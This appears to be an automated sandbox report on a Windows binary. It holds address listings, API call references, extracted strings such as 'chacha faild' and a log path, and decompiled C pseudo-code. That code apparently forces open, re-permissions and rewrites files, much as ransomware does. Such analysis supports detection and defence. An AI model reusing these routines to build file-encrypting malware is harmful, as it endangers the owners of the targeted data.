                                                                    0x00e6d870
                                                                    0x00e6d822
                                                                    0x00e6d823
                                                                    0x00e6d828
                                                                    0x00e6d82b
                                                                    0x00e6d82d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6d82d
                                                                    0x00e6d820
                                                                    0x00e6d583
                                                                    0x00e6d52b
                                                                    0x00e6d52c
                                                                    0x00e6d531
                                                                    0x00e6d534
                                                                    0x00e6d536
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6d536
                                                                    0x00e6d529
                                                                    0x00000000
                                                                    0x00e6d59f
                                                                    0x00e6d59f
                                                                    0x00e6d5a6
                                                                    0x00e6d6bc
                                                                    0x00e6d6d0
                                                                    0x00e6d6d5
                                                                    0x00e6d6db
                                                                    0x00e6d6e6
                                                                    0x00e6d6e8
                                                                    0x00e6d6ee
                                                                    0x00e6d6f4
                                                                    0x00e6d709
                                                                    0x00e6d70f
                                                                    0x00e6d715
                                                                    0x00e6d71b
                                                                    0x00e6d71d
                                                                    0x00e6d730
                                                                    0x00e6d739
                                                                    0x00000000
                                                                    0x00e6d71f
                                                                    0x00e6d720
                                                                    0x00e6d725
                                                                    0x00e6d728
                                                                    0x00e6d72a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6d72a
                                                                    0x00e6d6f6
                                                                    0x00e6d6f6
                                                                    0x00e6d700
                                                                    0x00e6d700
                                                                    0x00e6d73f
                                                                    0x00e6d74f
                                                                    0x00e6d754
                                                                    0x00e6d757
                                                                    0x00e6d759
                                                                    0x00e6d75b
                                                                    0x00000000
                                                                    0x00e6d761
                                                                    0x00e6d761
                                                                    0x00e6d767
                                                                    0x00000000
                                                                    0x00e6d76d
                                                                    0x00e6d76d
                                                                    0x00e6d774
                                                                    0x00000000
                                                                    0x00e6d776
                                                                    0x00e6d780
                                                                    0x00e6d786
                                                                    0x00e6d788
                                                                    0x00e6d78b
                                                                    0x00e6d790
                                                                    0x00e6d790
                                                                    0x00e6d795
                                                                    0x00e6d79b
                                                                    0x00000000
                                                                    0x00e6d7a1
                                                                    0x00e6d7a1
                                                                    0x00e6d7a7
                                                                    0x00000000
                                                                    0x00e6d7ad
                                                                    0x00e6d7ad
                                                                    0x00e6d7b3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6d7b3
                                                                    0x00e6d7a7
                                                                    0x00e6d79b
                                                                    0x00e6d774
                                                                    0x00e6d767
                                                                    0x00e6d6f8
                                                                    0x00e6d6f8
                                                                    0x00e6d6fe
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6d6fe
                                                                    0x00e6d6f6
                                                                    0x00e6d5ac
                                                                    0x00e6d5ac
                                                                    0x00e6d5b2
                                                                    0x00e6d5bd
                                                                    0x00e6d5bf
                                                                    0x00e6d5c2
                                                                    0x00e6d5c8
                                                                    0x00e6d5c8
                                                                    0x00e6d5cc
                                                                    0x00e6d5d2
                                                                    0x00e6d5d8
                                                                    0x00e6d5da
                                                                    0x00e6d5ed
                                                                    0x00e6d603
                                                                    0x00e6d609
                                                                    0x00e6d60b
                                                                    0x00e6d60e
                                                                    0x00e6d613
                                                                    0x00e6d613
                                                                    0x00e6d61c
                                                                    0x00e6d628
                                                                    0x00e6d636
                                                                    0x00e6d64e
                                                                    0x00e6d654
                                                                    0x00e6d656
                                                                    0x00e6d65c
                                                                    0x00e6d65f
                                                                    0x00e6d685
                                                                    0x00e6d691
                                                                    0x00e6d698
                                                                    0x00e6d6a1
                                                                    0x00e6d6aa
                                                                    0x00e6d6b3
                                                                    0x00e6d6b6
                                                                    0x00e6d6b9
                                                                    0x00000000
                                                                    0x00e6d661
                                                                    0x00e6d661
                                                                    0x00e6d667
                                                                    0x00e6d66d
                                                                    0x00e6d674
                                                                    0x00e6d67a
                                                                    0x00000000
                                                                    0x00e6d67a
                                                                    0x00e6d5dc
                                                                    0x00e6d5dd
                                                                    0x00e6d5e2
                                                                    0x00e6d5e5
                                                                    0x00e6d5e7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6d5e7
                                                                    0x00e6d5da
                                                                    0x00000000
                                                                    0x00e6d5a6
                                                                    0x00e6d4b3
                                                                    0x00e6d4b3
                                                                    0x00e6d4b9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6d4b9
                                                                    0x00e6d4b1
                                                                    0x00e6d4ab
                                                                    0x00e6d49f
                                                                    0x00e6cf78
                                                                    0x00e6cce1
                                                                    0x00e6cce1
                                                                    0x00e6ccec
                                                                    0x00e6ccec
                                                                    0x00e6ccee
                                                                    0x00e6cd01
                                                                    0x00e6cd19
                                                                    0x00e6cd1f
                                                                    0x00e6cd21
                                                                    0x00e6cd24
                                                                    0x00e6cd29
                                                                    0x00e6cd29
                                                                    0x00e6cd3c
                                                                    0x00e6cd41
                                                                    0x00e6cd44
                                                                    0x00e6cd46
                                                                    0x00e6cd6b
                                                                    0x00e6cd73
                                                                    0x00e6cd77
                                                                    0x00e6cd91
                                                                    0x00e6cd97
                                                                    0x00000000
                                                                    0x00e6cd48
                                                                    0x00e6cd48
                                                                    0x00e6cd4f
                                                                    0x00e6cd55
                                                                    0x00e6cd57
                                                                    0x00e6dc1b
                                                                    0x00e6cd5d
                                                                    0x00e6cd5e
                                                                    0x00e6cd64
                                                                    0x00000000
                                                                    0x00e6cd57
                                                                    0x00e6ccf0
                                                                    0x00e6ccf1
                                                                    0x00e6ccf6
                                                                    0x00e6ccf9
                                                                    0x00e6ccfb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6ccfb
                                                                    0x00e6cce3
                                                                    0x00e6cce3
                                                                    0x00e6cce6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6cce6
                                                                    0x00e6cce1
                                                                    0x00e6cca8
                                                                    0x00e6cca8
                                                                    0x00e6ccae
                                                                    0x00e6ccb0
                                                                    0x00e6ccb3
                                                                    0x00e6ccb3
                                                                    0x00e6ccba
                                                                    0x00000000
                                                                    0x00e6ccba
                                                                    0x00e6ca54
                                                                    0x00e6ca5a
                                                                    0x00e6ca5f
                                                                    0x00e6cab2
                                                                    0x00e6cab5
                                                                    0x00e6cac9
                                                                    0x00e6cacd
                                                                    0x00000000
                                                                    0x00e6cad3
                                                                    0x00e6cad9
                                                                    0x00e6cadf
                                                                    0x00e6cae2
                                                                    0x00e6caee
                                                                    0x00e6caf3
                                                                    0x00e6caf6
                                                                    0x00e6caf8
                                                                    0x00e6ddee
                                                                    0x00e6ddee
                                                                    0x00e6ddef
                                                                    0x00e6ddf4
                                                                    0x00e6ddf4
                                                                    0x00e6ddf5
                                                                    0x00e6ddfa
                                                                    0x00e6ddfa
                                                                    0x00e6ddfb
                                                                    0x00e6de00
                                                                    0x00e6de00
                                                                    0x00e6de01
                                                                    0x00e6de06
                                                                    0x00e6de06
                                                                    0x00e6de07
                                                                    0x00e6de0c
                                                                    0x00e6de0c
                                                                    0x00e6de0d
                                                                    0x00e6de12
                                                                    0x00e6de12
                                                                    0x00e6de13
                                                                    0x00e6de18
                                                                    0x00e6de19
                                                                    0x00e6de1e
                                                                    0x00e6de1f
                                                                    0x00e6de20
                                                                    0x00e6de21
                                                                    0x00e6de22
                                                                    0x00e6de23
                                                                    0x00e6de24
                                                                    0x00e6de25
                                                                    0x00e6de26
                                                                    0x00e6de27
                                                                    0x00e6de28
                                                                    0x00e6de29
                                                                    0x00e6de2a
                                                                    0x00e6de2b
                                                                    0x00e6de2c
                                                                    0x00e6de2d
                                                                    0x00e6de2e
                                                                    0x00e6de2f
                                                                    0x00e6de31
                                                                    0x00e6de44
                                                                    0x00e6de49
                                                                    0x00e6de4b
                                                                    0x00e6de52
                                                                    0x00e6de55
                                                                    0x00e6de5b
                                                                    0x00e6de5e
                                                                    0x00e6de60
                                                                    0x00e6de6d
                                                                    0x00e6de78
                                                                    0x00e6de7a
                                                                    0x00e6de80
                                                                    0x00e6de8a
                                                                    0x00e6de8e
                                                                    0x00e6de94
                                                                    0x00e6de98
                                                                    0x00e6de9f
                                                                    0x00e6dea5
                                                                    0x00e6dea7
                                                                    0x00e6e16c
                                                                    0x00e6e16d
                                                                    0x00e6e173
                                                                    0x00e6e173
                                                                    0x00e6dead
                                                                    0x00e6deb2
                                                                    0x00e6dec5
                                                                    0x00e6dedc
                                                                    0x00e6dee2
                                                                    0x00e6deee
                                                                    0x00e6def4
                                                                    0x00e6defa
                                                                    0x00e6df0e
                                                                    0x00e6df17
                                                                    0x00e6df1d
                                                                    0x00e6df1f
                                                                    0x00e6df29
                                                                    0x00e6df35
                                                                    0x00e6df3c
                                                                    0x00e6df43
                                                                    0x00e6df47
                                                                    0x00e6df4c
                                                                    0x00e6df50
                                                                    0x00e6df57
                                                                    0x00e6df59
                                                                    0x00e6df5a
                                                                    0x00e6df62
                                                                    0x00e6df6a
                                                                    0x00e6df6d
                                                                    0x00e6df70
                                                                    0x00e6df74
                                                                    0x00e6df77
                                                                    0x00e6df82
                                                                    0x00e6df8a
                                                                    0x00e6df8d
                                                                    0x00e6df8d
                                                                    0x00e6df90
                                                                    0x00e6df93
                                                                    0x00e6df93
                                                                    0x00e6df95
                                                                    0x00e6df98
                                                                    0x00e6df98
                                                                    0x00e6df9b
                                                                    0x00e6df9d
                                                                    0x00e6dfb7
                                                                    0x00e6dfbc
                                                                    0x00e6dfbf
                                                                    0x00e6dfc4
                                                                    0x00e6df9f
                                                                    0x00e6df9f
                                                                    0x00e6dfa3
                                                                    0x00e6dfa6
                                                                    0x00e6dfa8
                                                                    0x00e6dfab
                                                                    0x00e6dfab
                                                                    0x00e6dfae
                                                                    0x00e6dfb1
                                                                    0x00e6dfb1
                                                                    0x00e6dfc9
                                                                    0x00e6dfcc
                                                                    0x00e6dfcf
                                                                    0x00e6dfd6
                                                                    0x00e6dfe0
                                                                    0x00e6dfe4
                                                                    0x00e6dfea
                                                                    0x00e6dfed
                                                                    0x00e6dff1
                                                                    0x00e6dffb
                                                                    0x00e6dfff
                                                                    0x00e6e005
                                                                    0x00e6e008
                                                                    0x00e6e00c
                                                                    0x00e6e016
                                                                    0x00e6e01a
                                                                    0x00e6e020
                                                                    0x00e6e023
                                                                    0x00e6e027
                                                                    0x00e6e031
                                                                    0x00e6e035
                                                                    0x00e6e03b
                                                                    0x00e6e040
                                                                    0x00e6e04c
                                                                    0x00e6e052
                                                                    0x00e6e058
                                                                    0x00e6e05f
                                                                    0x00e6e066
                                                                    0x00e6e06d
                                                                    0x00e6e071
                                                                    0x00e6e078
                                                                    0x00e6e07f
                                                                    0x00e6e086
                                                                    0x00e6e08a
                                                                    0x00e6e08e
                                                                    0x00e6e098
                                                                    0x00e6e09d
                                                                    0x00e6e0a6
                                                                    0x00e6e0ac
                                                                    0x00e6e0b0
                                                                    0x00e6e0b5
                                                                    0x00e6e0bc
                                                                    0x00e6e0c0
                                                                    0x00e6e0c6
                                                                    0x00e6e0ca
                                                                    0x00e6e0ce
                                                                    0x00e6e0d4
                                                                    0x00e6e0d8
                                                                    0x00e6e0dc
                                                                    0x00e6e0e2
                                                                    0x00e6e0e9
                                                                    0x00e6e0ef
                                                                    0x00e6e0f5
                                                                    0x00e6e0f9
                                                                    0x00e6e0fc
                                                                    0x00e6e0fe
                                                                    0x00e6e0fe
                                                                    0x00e6e105
                                                                    0x00e6e114
                                                                    0x00e6e125
                                                                    0x00e6e12d
                                                                    0x00e6e12f
                                                                    0x00e6e154
                                                                    0x00e6e15b
                                                                    0x00e6e160
                                                                    0x00e6e167
                                                                    0x00000000
                                                                    0x00e6e131
                                                                    0x00e6e132
                                                                    0x00e6e138
                                                                    0x00e6e13f
                                                                    0x00e6e144
                                                                    0x00e6e14b
                                                                    0x00e6e150
                                                                    0x00e6e150
                                                                    0x00e6e12f
                                                                    0x00e6e175
                                                                    0x00e6e17f
                                                                    0x00e6e189
                                                                    0x00e6e197
                                                                    0x00e6e1a1
                                                                    0x00e6cafe
                                                                    0x00e6cafe
                                                                    0x00e6cb15
                                                                    0x00e6cb1a
                                                                    0x00e6cb2c
                                                                    0x00e6cb31
                                                                    0x00e6cb34
                                                                    0x00000000
                                                                    0x00e6cb34
                                                                    0x00e6caf8
                                                                    0x00e6cabc
                                                                    0x00e6cabc
                                                                    0x00e6cac1
                                                                    0x00e6cb5e
                                                                    0x00e6cb66
                                                                    0x00e6cb6b
                                                                    0x00e6cb7e
                                                                    0x00e6cb83
                                                                    0x00e6cb86
                                                                    0x00e6cb8e
                                                                    0x00e6cb90
                                                                    0x00e6cb90
                                                                    0x00e6cba1
                                                                    0x00e6cba8
                                                                    0x00e6cbb1
                                                                    0x00e6cbb3
                                                                    0x00e6cbbd
                                                                    0x00e6cbc3
                                                                    0x00e6cbc8
                                                                    0x00e6cbd0
                                                                    0x00e6cbd4
                                                                    0x00e6cbdf
                                                                    0x00e6cbe4
                                                                    0x00e6cbee
                                                                    0x00e6cbf6
                                                                    0x00e6cc00
                                                                    0x00e6cc05
                                                                    0x00e6cc12
                                                                    0x00e6cac7
                                                                    0x00e6cb37
                                                                    0x00e6cb39
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6cb39
                                                                    0x00e6ddd1
                                                                    0x00e6ddd3
                                                                    0x00e6ddd6
                                                                    0x00e6dded
                                                                    0x00e6dded
                                                                    0x00e6ca61
                                                                    0x00e6ca61
                                                                    0x00e6ca69
                                                                    0x00e6ca75
                                                                    0x00e6ca95
                                                                    0x00e6caa1
                                                                    0x00e6caa3
                                                                    0x00e6caac
                                                                    0x00e6cc1c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00e6caac
                                                                    0x00e6ca5f
                                                                    0x00000000

                                                                    APIs
                                                                    • CloseHandle.KERNEL32(FFFFFFFF,A6ABE2D4,?,00000000), ref: 00E6C9FD
                                                                    • CreateFileW.KERNEL32(?,0012019F,00000003,00000000,00000003,10000000,00000000), ref: 00E6CA17
                                                                    • CreateFileW.KERNEL32(?,0012019B,00000003,00000000,00000003,B0000000,00000000), ref: 00E6CA37
                                                                    • GetLastError.KERNEL32 ref: 00E6CA54
                                                                      • Part of subcall function 00E86F30: SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000001,00000000,00000000,00000000,00000000), ref: 00E86F54
                                                                      • Part of subcall function 00E86F30: SetEntriesInAclW.ADVAPI32(00000001,?,00000000,?), ref: 00E86F97
                                                                      • Part of subcall function 00E86F30: SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000004,00000000,00000000,00000000,00000000), ref: 00E86FAB
                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 00E6CA75
                                                                    • CreateFileW.KERNEL32(?,0012019F,00000003,00000000,00000003,10000000,00000000), ref: 00E6CA8F
                                                                    • GetLastError.KERNEL32 ref: 00E6CA9B
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E6CB2C
                                                                    • GetFileSizeEx.KERNEL32(?,?), ref: 00E6CC75
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E6CCB3
                                                                    • CloseHandle.KERNEL32(?), ref: 00E6CCBA
                                                                    • ReadFile.KERNEL32(?,00000000,00000004,00000000,00000000), ref: 00E6CD19
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E6CD24
                                                                    • CloseHandle.KERNEL32(?), ref: 00E6CD4F
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E6CD5E
                                                                    • SetFilePointerEx.KERNEL32(?,?,?,?,00000000), ref: 00E6CD91
                                                                    • __aullrem.LIBCMT ref: 00E6D04C
                                                                    • SetEvent.KERNEL32(?,?,80000000,00000025), ref: 00E6D062
                                                                    • WaitForSingleObject.KERNEL32(000000FF), ref: 00E6D070
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E6D0EB
                                                                    • __allrem.LIBCMT ref: 00E6D161
                                                                    • ReadFile.KERNEL32(?,?,A6ABE2D4,00000000,00000000), ref: 00E6D555
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E6D592
                                                                    • ReadFile.KERNEL32(?,00000000,?,00000000,00000000,A6ABE2D4,?), ref: 00E6D603
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E6D60E
                                                                    • SetFilePointerEx.KERNEL32(?,?,?,?,00000001), ref: 00E6D636
                                                                    • ReOpenFile.KERNEL32(?,00120089,00000003,30000000), ref: 00E6D64E
                                                                    • SetEvent.KERNEL32(00000000,00000000,A6ABE2D4,?), ref: 00E6D739
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00E6D780
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E6D78B
                                                                    • SetFilePointerEx.KERNEL32(?,A6ABE2D4,?,?,00000001), ref: 00E6D7D5
                                                                    • WriteFile.KERNEL32(?,?,A6ABE2D4,00000000,00000000), ref: 00E6D849
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E6D854
                                                                    • SetFilePointerEx.KERNEL32(?,?,?,?,00000001,?,?,A6ABE2D4,?), ref: 00E6D8D6
                                                                    • SetFilePointerEx.KERNEL32(?,?,?,?,00000000), ref: 00E6D9B7
                                                                    • ReadFile.KERNEL32(?,?,?,00000000,00000000), ref: 00E6D9FA
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E6DA05
                                                                    • SetFilePointerEx.KERNEL32(?,?,?,?,00000001), ref: 00E6DA59
                                                                    • WriteFile.KERNEL32(?,?,?,00000000,00000000), ref: 00E6DB4F
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E6DB5A
                                                                    • WriteFile.KERNEL32(?,?,?,00000000,00000000), ref: 00E6DB8B
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E6DB96
                                                                    • CloseHandle.KERNEL32(?), ref: 00E6DBD9
                                                                    • CloseHandle.KERNEL32(?), ref: 00E6DBEA
                                                                    • CloseHandle.KERNEL32(?), ref: 00E6DBFB
                                                                    • SetLastError.KERNEL32(00000000), ref: 00E6DC30
                                                                    • GetLastError.KERNEL32 ref: 00E6DC36
                                                                    • __Mtx_unlock.LIBCPMT ref: 00E6DC99
                                                                    • CloseHandle.KERNEL32(?), ref: 00E6DD93
                                                                    • CloseHandle.KERNEL32(?), ref: 00E6DD9F
                                                                    • CloseHandle.KERNEL32(?), ref: 00E6DDB0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$CloseHandleMtx_unlock$Pointer$ErrorLastRead$CreateWrite$EventInfoNamedObjectSecuritySingleWait$AttributesEntriesOpenSize__allrem__aullrem
                                                                    • String ID: error:$\ProgramData\Adobe\Extension Manager CC\Logs\fails.txt$\\?\c:$chacha faild$goodjob
                                                                    • API String ID: 3375045143-22347159
                                                                    • Opcode ID: b5c661da8e9d18e7fd94189efa37531493f3d5691388ee06ac213759436eea2f
                                                                    • Instruction ID: e7390b3560c8c073a9cc984b48868571fac2c92063d1bf19de8760c2f59504ad
                                                                    • Opcode Fuzzy Hash: b5c661da8e9d18e7fd94189efa37531493f3d5691388ee06ac213759436eea2f
                                                                    • Instruction Fuzzy Hash: D1C27871E482289FDB219B24DC45BADB7B4EF59304F0451E9E84CB7252DB39AE84CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 67%
                                                                    			E00E84B50(void* __ebx, WCHAR* __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4) {
                                                                    				long _v8;
                                                                    				char _v16;
                                                                    				signed int _v20;
                                                                    				short _v24;
                                                                    				char _v88;
                                                                    				void* _v89;
                                                                    				void* _v96;
                                                                    				void* _v100;
                                                                    				void* _v104;
                                                                    				void* _v108;
                                                                    				void* _v112;
                                                                    				void* _v116;
                                                                    				void _v120;
                                                                    				signed int _v124;
                                                                    				char _v128;
                                                                    				void* _v132;
                                                                    				char _v136;
                                                                    				long _v140;
                                                                    				long _v144;
                                                                    				char* _v160;
                                                                    				char _v180;
                                                                    				long _v184;
                                                                    				char* _v200;
                                                                    				char _v220;
                                                                    				long _v224;
                                                                    				char _v260;
                                                                    				signed int _v264;
                                                                    				void* _v268;
                                                                    				char _v272;
                                                                    				signed int _v276;
                                                                    				signed int _v280;
                                                                    				char _v284;
                                                                    				char _v288;
                                                                    				char _v292;
                                                                    				signed int _v296;
                                                                    				WCHAR* _v300;
                                                                    				signed int _v304;
                                                                    				char* _v308;
                                                                    				char* _v312;
                                                                    				char* _v316;
                                                                    				char* _v320;
                                                                    				char* _v324;
                                                                    				char* _v328;
                                                                    				char* _v332;
                                                                    				char* _v336;
                                                                    				signed int _t303;
                                                                    				signed int _t304;
                                                                    				void* _t307;
                                                                    				intOrPtr _t308;
                                                                    				void _t321;
                                                                    				long _t323;
                                                                    				signed int _t324;
                                                                    				void _t337;
                                                                    				long _t339;
                                                                    				signed int _t340;
                                                                    				signed int _t341;
                                                                    				void _t357;
                                                                    				long _t359;
                                                                    				signed int _t360;
                                                                    				signed int _t361;
                                                                    				void* _t373;
                                                                    				void* _t377;
                                                                    				signed int _t379;
                                                                    				signed int _t383;
                                                                    				signed int _t391;
                                                                    				signed int _t395;
                                                                    				signed int _t400;
                                                                    				signed int _t408;
                                                                    				signed int _t412;
                                                                    				signed int _t417;
                                                                    				signed int _t425;
                                                                    				signed int _t429;
                                                                    				intOrPtr _t435;
                                                                    				void* _t442;
                                                                    				signed int _t443;
                                                                    				signed int _t444;
                                                                    				intOrPtr* _t445;
                                                                    				signed int _t446;
                                                                    				void* _t448;
                                                                    				void* _t450;
                                                                    				intOrPtr _t451;
                                                                    				void* _t452;
                                                                    				signed int _t453;
                                                                    				void* _t456;
                                                                    				void* _t466;
                                                                    				void* _t468;
                                                                    				void* _t470;
                                                                    				signed int _t485;
                                                                    				signed int _t488;
                                                                    				WCHAR* _t501;
                                                                    				signed int _t504;
                                                                    				intOrPtr* _t505;
                                                                    				signed int _t507;
                                                                    				intOrPtr* _t509;
                                                                    				signed int _t510;
                                                                    				signed int _t521;
                                                                    				short* _t526;
                                                                    				intOrPtr* _t527;
                                                                    				signed int _t529;
                                                                    				intOrPtr* _t530;
                                                                    				WCHAR* _t533;
                                                                    				signed int _t536;
                                                                    				void* _t537;
                                                                    				signed int _t539;
                                                                    				void* _t540;
                                                                    				signed int _t542;
                                                                    				intOrPtr _t543;
                                                                    				void* _t548;
                                                                    				void* _t549;
                                                                    				signed int _t550;
                                                                    				short* _t557;
                                                                    				void* _t559;
                                                                    				intOrPtr* _t560;
                                                                    				signed int _t561;
                                                                    				void* _t562;
                                                                    				void* _t563;
                                                                    				void* _t564;
                                                                    				void* _t566;
                                                                    				void* _t571;
                                                                    				void* _t573;
                                                                    				void* _t575;
                                                                    
                                                                    				_t470 = __ebx;
                                                                    				_push(0xffffffff);
                                                                    				_push(0xecb60c);
                                                                    				_push( *[fs:0x0]);
                                                                    				_t563 = _t562 - 0x144;
                                                                    				_t303 =  *0xeef074; // 0xa6abe2d4
                                                                    				_t304 = _t303 ^ _t561;
                                                                    				_v20 = _t304;
                                                                    				_push(__esi);
                                                                    				_push(__edi);
                                                                    				_push(_t304);
                                                                    				 *[fs:0x0] =  &_v16;
                                                                    				_v304 = __edx;
                                                                    				_t533 = __ecx;
                                                                    				_v300 = __ecx;
                                                                    				E00E840D0( &_v120);
                                                                    				_v8 = 0;
                                                                    				if( *0xf2c0a9 == 0) {
                                                                    					L39:
                                                                    					_t307 = CreateFileW(_t533, 0x12019f, 0, 0, 3, 0, 0);
                                                                    					_t473 = _v304;
                                                                    					 *_v304 = _t307;
                                                                    					if(_t307 == 0xffffffff) {
                                                                    						_t308 =  *0xf2c2c0; // 0x0
                                                                    						__eflags = _t308 - 0x37;
                                                                    						if(_t308 <= 0x37) {
                                                                    							L44:
                                                                    							asm("lock inc dword [0xf2c2c0]");
                                                                    							_v8 = 1;
                                                                    							_t546 = 0;
                                                                    							_v128 = 0x7b;
                                                                    							_v124 = 1;
                                                                    							_v296 = 0;
                                                                    							E00EA8F90(_t533,  &_v88, 0, 0x42);
                                                                    							_t564 = _t563 + 0xc;
                                                                    							__eflags = _a4;
                                                                    							if(_a4 != 0) {
                                                                    								 *0xf2c0b0( &_v88, 0x40);
                                                                    							}
                                                                    							__eflags = 0;
                                                                    							_v24 = 0;
                                                                    							while(1) {
                                                                    								_v89 = 0;
                                                                    								_v136 =  &_v124;
                                                                    								_v268 =  &_v88;
                                                                    								_v272 =  &_v128;
                                                                    								_v100 = _v96;
                                                                    								_v324 =  &_v100;
                                                                    								_v320 =  &_v272;
                                                                    								_v316 =  &_v268;
                                                                    								_v312 =  &_v136;
                                                                    								_v144 = 0;
                                                                    								_v8 = 2;
                                                                    								asm("movups xmm0, [ebp-0x140]");
                                                                    								_v160 =  &_v89;
                                                                    								_t321 =  &_v180;
                                                                    								_v180 = 0xed9c30;
                                                                    								asm("movups [ebp-0xac], xmm0");
                                                                    								_v144 = _t321;
                                                                    								_v8 = 3;
                                                                    								_v120 = _t321;
                                                                    								SetEvent(_v104);
                                                                    								_t323 = WaitForSingleObject(_v116, 0x514);
                                                                    								__eflags = _t323 - 0x102;
                                                                    								if(_t323 != 0x102) {
                                                                    									goto L55;
                                                                    								}
                                                                    								_t473 =  *0xf2c29c;
                                                                    								 *0xecd328();
                                                                    								NtTerminateThread(_v112, 0x14d);
                                                                    								CloseHandle(_v112);
                                                                    								_v112 = 0;
                                                                    								do {
                                                                    									_t425 = CreateThread(0, 0x40000, E00E841F0,  &_v120, 0, 0);
                                                                    									_v112 = _t425;
                                                                    									__eflags = _t425;
                                                                    								} while (_t425 == 0);
                                                                    								ResetEvent(_v116);
                                                                    								ResetEvent(_v104);
                                                                    								_v120 = 0;
                                                                    								_v8 = 1;
                                                                    								_t534 = _v144;
                                                                    								__eflags = _t534;
                                                                    								if(_t534 != 0) {
                                                                    									_t429 =  &_v180;
                                                                    									__eflags = _t534 - _t429;
                                                                    									_t102 = _t534 != _t429;
                                                                    									__eflags = _t102;
                                                                    									 *0xecd328(_t429 & 0xffffff00 | _t102);
                                                                    									_t473 = _t534;
                                                                    									 *((intOrPtr*)( *((intOrPtr*)( *_t534 + 0x10))))();
                                                                    									_v144 = 0;
                                                                    								}
                                                                    								_t546 = _v296;
                                                                    								L53:
                                                                    								__eflags = _t546 - 3;
                                                                    								if(__eflags >= 0) {
                                                                    									L60:
                                                                    									if(__eflags == 0) {
                                                                    										L98:
                                                                    										E00E86270(_t470,  &_v120, __imp__RmEndSession, _t534, _t546, _t473, _v128);
                                                                    										L103:
                                                                    										_v8 = 0;
                                                                    										asm("lock dec dword [0xf2c2c0]");
                                                                    										L104:
                                                                    										_v8 = 0xffffffff;
                                                                    										E00E84170( &_v120);
                                                                    										L105:
                                                                    										 *[fs:0x0] = _v16;
                                                                    										return E00EA7663(_v20 ^ _t561);
                                                                    									}
                                                                    									_t546 = 0;
                                                                    									__eflags = 0;
                                                                    									_v124 = 1;
                                                                    									while(1) {
                                                                    										_v296 = _t546;
                                                                    										_v268 =  &_v124;
                                                                    										_v272 = _v300;
                                                                    										_v136 = _v128;
                                                                    										_v324 =  &_v96;
                                                                    										_v320 =  &_v136;
                                                                    										_v316 =  &_v272;
                                                                    										_v312 =  &_v268;
                                                                    										_v89 = 0;
                                                                    										_v184 = 0;
                                                                    										_v8 = 6;
                                                                    										asm("movups xmm0, [ebp-0x140]");
                                                                    										_v200 =  &_v89;
                                                                    										_t337 =  &_v220;
                                                                    										_v220 = 0xed9c14;
                                                                    										asm("movups [ebp-0xd4], xmm0");
                                                                    										_v184 = _t337;
                                                                    										_v8 = 7;
                                                                    										_v120 = _t337;
                                                                    										SetEvent(_v104);
                                                                    										_t339 = WaitForSingleObject(_v116, 0x514);
                                                                    										__eflags = _t339 - 0x102;
                                                                    										if(_t339 != 0x102) {
                                                                    											goto L70;
                                                                    										}
                                                                    										_t473 =  *0xf2c29c;
                                                                    										 *0xecd328();
                                                                    										NtTerminateThread(_v112, 0x14d);
                                                                    										CloseHandle(_v112);
                                                                    										_v112 = 0;
                                                                    										do {
                                                                    											_t408 = CreateThread(0, 0x40000, E00E841F0,  &_v120, 0, 0);
                                                                    											_v112 = _t408;
                                                                    											__eflags = _t408;
                                                                    										} while (_t408 == 0);
                                                                    										ResetEvent(_v116);
                                                                    										ResetEvent(_v104);
                                                                    										_v120 = 0;
                                                                    										_v8 = 1;
                                                                    										_t534 = _v184;
                                                                    										__eflags = _t534;
                                                                    										if(_t534 != 0) {
                                                                    											_t412 =  &_v220;
                                                                    											__eflags = _t534 - _t412;
                                                                    											_t161 = _t534 != _t412;
                                                                    											__eflags = _t161;
                                                                    											 *0xecd328(_t412 & 0xffffff00 | _t161);
                                                                    											_t473 = _t534;
                                                                    											 *((intOrPtr*)( *((intOrPtr*)( *_t534 + 0x10))))();
                                                                    											_v184 = 0;
